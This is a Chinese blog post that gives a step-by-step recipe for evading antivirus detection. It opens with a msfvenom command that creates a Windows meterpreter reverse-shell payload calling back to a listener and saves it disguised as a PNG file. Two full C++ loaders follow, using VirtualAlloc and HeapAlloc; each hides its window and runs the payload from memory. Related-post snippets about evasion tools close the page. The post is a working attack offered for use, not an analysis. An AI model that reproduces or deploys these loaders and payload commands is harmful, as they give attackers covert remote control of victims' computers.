linux源码免杀,免杀shellcode 2020/11/29 VirtualAlloc&HeapAlloc

最新推荐文章于 2024-07-21 17:09:56 发布
最新推荐文章于 2024-07-21 17:09:56 发布
阅读量302 收藏 1
点赞数
文章标签: linux源码免杀

编译环境VS2019

Kali Linux 2020.3

VirusTotal 检测

bd9d81cb699bc5608ab6a4a34cb87bfb.png

运行截图

f629cb3b45436f61cbc7aeb4f6967220.png

食用步骤

1、msfvenom生成shellcoderoot@kali:~/Desktop# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.110.128 LPORT=4444 -f raw -o shell.png

2、编译可执行文件

VirtualAlloc#include

#include

#include

#include

// 让控制台程序后台运行

#pragma comment(linker, "/subsystem:windows /entry:mainCRTStartup")

int main()

{

FILE* fp;

size_t size;

unsigned char* buffer;

errno_t err;

err = fopen_s(&fp, "shell.png", "rb");

if (fp && !err)

{

fseek(fp, 0, SEEK_END);

size = ftell(fp);

fseek(fp, 0, SEEK_SET);

buffer = (unsigned char*)malloc(size);

if (buffer != NULL)

{

fread(buffer, size, 1, fp);

void* exec = VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

if (exec != NULL)

{

memcpy(exec, buffer, size);

((void(*) ())exec)();

}

}

}

else

{

std::cout << "could not open file" << std::endl;

}

return 0;

}

HeapAlloc#include

#include

#include

#include

// 让控制台程序后台运行

#pragma comment(linker, "/subsystem:windows /entry:mainCRTStartup")

int main()

{

FILE* fp;

size_t size;

unsigned char* buffer;

errno_t err;

err = fopen_s(&fp, "shell.png", "rb");

if (fp && !err)

{

fseek(fp, 0, SEEK_END);

size = ftell(fp);

fseek(fp, 0, SEEK_SET);

buffer = (unsigned char*)malloc(size);

if (buffer != NULL)

{

fread(buffer, size, 1, fp);

HANDLE hHep = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE | HEAP_ZERO_MEMORY, 0, 0);

PVOID Mptr = HeapAlloc(hHep, 0, size);

RtlCopyMemory(Mptr, buffer, size);

DWORD dwThreadId = 0;

HANDLE hThread = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)Mptr, NULL, NULL, &dwThreadId);

WaitForSingleObject(hThread, INFINITE);

}

}

else

{

std::cout << "could not open file" << std::endl;

}

return 0;

}

3、将编译的可执行文件与shell.png文件放在同一目录下,运行编译的可执行文件。

光合固氮
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
-花指令
08-21
-花指令】这一主题涉及的是在编程领域中如何通过特定技术来避恶意软件检测,尤其是针对Delphi编写的程序。(Anti-Virus Evasion)是黑客和安全研究人员关注的一个重要领域,它涉及到如何让恶意代码...
最新360,基于shellcode字符混淆
06-22
基于Shellcode的字符混淆是一种常见的技术,用于使恶意代码逃避反病毒软件和其他安全解决方案的检测。壳代码(Shellcode)是一段非常短小的机器码,通常用于实现特定的功能,如创建后门或执行命令行。由于其精简性和...
shellcode之VirtualAlloc函数加载shellcode
orange777
02-27 979
go语言木马
Linux中利用mmap模拟Windows的VirtualAlloc
手边笔记
06-18 5184
主要利用mmap中的匿名映射来实现。 VirtualAlloc的Linux实现如下: // 预留内存(相当于Windows-VirtualAlloc的MEM_RESERVE)。 // 用mmap映射一块private、anonymous、non-accessible的内存。 // 下面表示从0x10000000开始,预留1GB的内存 void* result1 = mma
C++中的内存管理
m0_56910081的博客
10-20 897
c++内存分配的方式 C++中动态内存分配的方式是以malloc或C++的全局new运算符进行动态分配的。 malloc函数的底层实现 Linux进程堆管理 Windows进程堆管理堆分配算法
/-小白漏洞笔记
最新发布
程序员三九的博客
07-21 349
MSF 已经是广为人知的非常流行的渗透平台,没有之一。而作为专注于后渗透的我,最常用的也是 MSF 强大的后渗透功能。
9.4 RetLibc实战之利用VirtualAlloc
qq_55202378的博客
11-14 559
Ret2LIbc
65.远控专题(65)-shellcode实践1
08-03
本文主要探讨的是如何通过不同的方法实现shellcode(一段可以直接由CPU执行的机器码)的,从而绕过毒软件的检测。 一、直接生成可执行文件 在第一部分,作者介绍了通过使用Code Signing Studio(CS)生成...
CS木马技巧分享.pdf
08-11
01Shellcode加载器 02 Powershell 03 利用场景介绍
通过Python实现Payload分离过程详解
01-19
msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x37\x64\...
Linux常见内存分配函数
02-21
Linux内核中常见内存分配函数
linux常用,【kali linux】详细分析两个远控 了解远控和原理
weixin_42531886的博客
05-13 923
该楼层疑似违规已被系统折叠隐藏此楼查看此楼Hi 大家好 我是杰爱蓝莓今天起跟大家从代码分析两个的远控 让大家能够了解远控程序的原理,以及技术实现的一些原理两个远控1:用Python语言写的 可以运行在Linux操作系统 和Windows操作系统2:用c#语言写的 可以运行在Windows操作系统首先我给大家演示一下这两个远控的使用再用360毒测试是否它们都是的再跟...
对抗无落地的shellcode注入
hongduilanjun的博客
07-21 1721
一般的shellcode加载到内存都是通过和来获取函数进行shellcode加载,亦或是通过远程申请一块空间来放入shellcode的地址进行加载。为了隐蔽,攻击者通常会通过PEB找到链表,自己去定位函数从而规避软对导入表的监控。攻击者先把shellcode加密,在写入时解密存放到内存空间,使用基于文件检测的方法,是无能为力的,那么这种无落地的方式,最终都会在内存中一览无余。...
Windows堆
南宫封清的博客
10-20 1019
堆(HEAP)的分配,使用,回收都是通过微软的API来管理的,最常见的API是malloc和new。在往底层走一点呢,这两个函数都会调 用HeapAlloc(RtlAllocateHeap)。同样的相关函数还有HeapFree用来释放堆,HeapCreate用来创建自己的私有堆。 下面是这些函数的调用链: HeapCreate->RtlCreateHeap->ZwAllocateVirtualMemory (这里会直接申请一大片内存,至于申请多大内存,由进程PEB结构中的字段觉得,HeapSe
linux工具,kali 工具shellter安装以及使用
weixin_39726044的博客
05-12 1000
Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避毒软件的查。俗称为官网:https://www.shellterproject.com/ 目前最新版本是7.2,主程序是.exe文件所以在windows下可以直接使用,在linux上运行的话就需要安装wine环境来运行。我使用的Kali Linux 版本是kali-linu...
kali linux技术
weixin_30690833的博客
03-05 927
恶意软件: 病毒,木马。蠕虫,键盘记录,僵尸程序,流氓软件,勒索软件,广告程序 在用户非自愿的情况下安装 出于某种恶意的目的:控制,窃取,勒索,偷窥,推送,攻击 恶意程序最主要的防护手段:软 检测原理:基于二进制文件中特征签名的黑名单检测方法;基于行为的分析方法(启发式) 技术: 修改二进制文件中的特征字符---替换,擦除,修改 加密技术(cry...
vulnhub靶机渗透 LazysysAdmin
RestoreJustice的博客
03-19 165
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。根据内核信息,用CVE-2017-1000112提权即可,但是目标机上没有gcc,这种情况,可以本地搭建和目标机一样的环境,在本地编译好提权exp后,在目标机器上运行即可。根据内核信息,用CVE-2017-1000112提权即可,但是目标机上没有gcc,这种情况,可以本地搭建和目标机一样的环境,在本地编译好提权exp后,在目标机器上运行即可。
Kail Linux渗透测试教程之Payload生成工具Veil
09-01 501
Kail Linux渗透测试教程之Payload生成工具Veil Payload生成工具——Veil Kail Linux渗透测试教程之Payload生成工具Veil,Veil是一款利用...
虚拟内存(VirtualAlloc),堆(HeapAlloc/malloc/new)和Memory Mapped File
zj510的专栏
09-19 8041
内存管理有三种方式: 1. 虚拟内存,VirtualAlloc之类的函数 2. 堆,Heapxxx函数,malloc,new等 3. 内存映射文件,Memory Mapped File 很多人都会困惑,但是看下面的图片就会比较明白了。这个图片从MSDN上拷来。 堆和虚拟内存,从上面的图片就可以看出,其实所谓的堆,也就是在虚拟内存上抽象出来的。如果直接用Virtualxxx系列函数,是
"Shellcode实战:远控专题(65)
本篇文章是关于远控专题的第65篇,讲述了shellcode的实践。作者为Tide安全团队的成员雨夜RainyNight。文章中提到的技术、思路和工具仅供安全学习交流使用,禁止用于非法和盈利目的,违者后果自负。Tide安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值